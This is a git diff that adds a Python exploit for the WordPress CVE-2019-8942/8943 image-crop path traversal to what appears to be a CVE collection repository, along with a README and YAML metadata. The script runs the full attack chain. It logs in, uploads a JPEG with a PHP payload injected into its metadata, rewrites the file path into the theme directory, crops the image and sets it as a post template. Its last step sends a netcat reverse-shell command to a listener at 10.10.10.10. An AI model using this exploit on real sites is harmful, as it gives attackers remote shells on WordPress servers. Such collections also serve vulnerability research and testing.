diff --git a/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py b/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py new file mode 100644 index 00000000..94f4582c --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8943/CVE-2019-8943.py @@ -0,0 +1,185 @@ +#/usr/bin/env python3 +# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution +# Date: 2020-02-01 +# Exploit Author: OUSSAMA RAHALI ( aka V0lck3r) +# https://www.linkedin.com/in/oussamarahali +# Discovery Author : RIPSTECH Technology +# Version: WordPress 5.0.0 and <= 4.9.8 . +# References : CVE-2019-8942 | CVE-2019-8943 | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ + +import requests +import re +import sys +from datetime import datetime + +banner = """ +__ __ _ ____ ____ _____ +\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___ | _ \ / ___| ____| + \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | | | _| + \ V V / (_) | | | (_| | |_) | | | __/\__ \__ \ | _ <| |___| |___ + \_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/ |_| \_\\____|_____| + |_| + 5.0.0 and <= 4.9.8 +""" +print(banner) +print("usage :") +print("=======") +usage = 'python3 RCE_wordpress.py http://:/ ' +print(usage) + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +wp_theme = sys.argv[4] # wpscan results + +lhost = '10.10.10.10' #attacker ip +lport = '4141' #listening port + +date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/' + +imagename = 'gd.jpg' +# ====== +# Note : +# ====== +# It could be any jpg image, BUT there are some modifications first : +# 1- image name as : "gd.jpg" +# 2- place the image in the same directory as this exploit. +# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="" + +data = { + 'log':username, + 'pwd':password, + 'wp-submit':'Log In', + 'redirect_to':url+'wp-admin/', + 'testcookie':1 +} + +r = requests.post(url+'wp-login.php',data=data) + +if r.status_code == 200: + print("[+] Login successful.\n") +else: + print("[-] Failed to login.") + exit(0) + +cookies = r.cookies + +print("[+] Getting Wp Nonce ... ") + +res = requests.get(url+'wp-admin/media-new.php',cookies=cookies) +wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) + +if len(wp_nonce_list) == 0 : + print("[-] Failed to retrieve the _wpnonce \n") + exit(0) +else : + wp_nonce = wp_nonce_list[0] + print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n") + +print("[+] Uploading the image ... ") + +data = { + 'name': 'gd.jpg', + 'action': 'upload-attachment', + '_wpnonce': wp_nonce +} + +image = {'async-upload': (imagename, open(imagename, 'rb'))} +r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies) +if r_upload.status_code == 200: + image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] + _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] + print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n") +else : + print("[-] Failed to receive a response for uploaded image ! try again . \n") + exit(0) + +print("[+] Changing the path ... ") + + +data = { + '_wpnonce':_wp_nonce, + 'action':'editpost', + 'post_ID':image_id, + 'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali' +} + +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Path has been changed successfully. \n") +else : + print("[-] Failed to change the path ! Make sure the theme is correcte .\n") + exit(0) + +print("[+] Getting Ajax nonce ... ") + +data = { + 'action':'query-attachments', + 'post_id':0, + 'query[item]':43, + 'query[orderby]':'date', + 'query[order]':'DESC', + 'query[posts_per_page]':40, + 'query[paged]':1 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text) + +if res.status_code == 200 and len(ajax_nonce_list) != 0 : + ajax_nonce = ajax_nonce_list[0] + print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n') +else : + print("[-] Failed to retrieve ajax_nonce.\n") + exit(0) + + +print("[+] Cropping the uploaded image ... ") + +data = { + 'action':'crop-image', + '_ajax_nonce':ajax_nonce, + 'id':image_id, + 'cropDetails[x1]':0, + 'cropDetails[y1]':0, + 'cropDetails[width]':200, + 'cropDetails[height]':100, + 'cropDetails[dst_width]':200, + 'cropDetails[dst_height]':100 +} + +res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] Done . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +print("[+] Creating a new post to include the image... ") + +res = requests.post(url+'wp-admin/post-new.php', cookies=cookies) +if res.status_code == 200: + _wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0] + post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0] + print("[+] Post created successfully . \n") +else : + print("[-] Erorr ! Try again \n") + exit(0) + +data={ + '_wpnonce':_wpnonce, + 'action':'editpost', + 'post_ID':post_id, + 'post_title':'RCE poc by v0lck3r', + 'post_name':'RCE poc by v0lck3r', + 'meta_input[_wp_page_template]':'cropped-rahali.jpg' +} +res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) +if res.status_code == 200: + print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n') + print("[+] Executing payload !") + requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies) + +else : + print("[-] Erorr ! Try again (maybe change the payload) \n") + exit(0) \ No newline at end of file diff --git a/cve/WordPress/2019/CVE-2019-8943/README.md b/cve/WordPress/2019/CVE-2019-8943/README.md new file mode 100644 index 00000000..6b198687 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8943/README.md @@ -0,0 +1,19 @@ +# CVE-2019-8943 + +WordPress 5.0.0 - Image Remote Code Execution + +Exploit of CVE-2019-8942 and CVE-2019-8943 using python : ExploitDB : https://www.exploit-db.com/exploits/49512 + +The original exploit for metasploit : WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) : https://www.exploit-db.com/exploits/46662 + +## video : + +[![Watch the video](https://raw.githubusercontent.com/v0lck3r/CVE-2019-8943/main/poc.png)](https://player.vimeo.com/video/507536840) +## Description: + + +The video below demonstrates how an attacker could potentially compromise a wordpress website and achieve RCE (remote code execution) by exploiting the vulnerabilities linked above (CVE-2019-8942 and CVE-2019-8943). + +Note: I made this exploit while I was working on tryhackme blog room : https://tryhackme.com/room/blog without using metasploit . + +By : Oussama RAHALI \ No newline at end of file diff --git a/cve/WordPress/2019/yaml/CVE-2019-8943.yaml b/cve/WordPress/2019/yaml/CVE-2019-8943.yaml new file mode 100644 index 00000000..a834c00a --- /dev/null +++ b/cve/WordPress/2019/yaml/CVE-2019-8943.yaml @@ -0,0 +1,20 @@ +id: CVE-2019-8943 +source: https://github.com/v0lck3r/CVE-2019-8943 +info: + name: WordPress + severity: MEDIUM + description: | + WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. + scope-of-influence: + WordPress < 4.9.9 + WordPress 5.x < 5.0.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-8943 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2019-8943 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: RCE, 远程代码执行 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 07af3a60..ec68679e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -100,6 +100,8 @@ cve: weblogic: - CVE-2020-2551 - CVE-2020-14882 + wordpress: + - CVE-2019-8943 polkit: - CVE-2021-4034 - CVE-2021-4115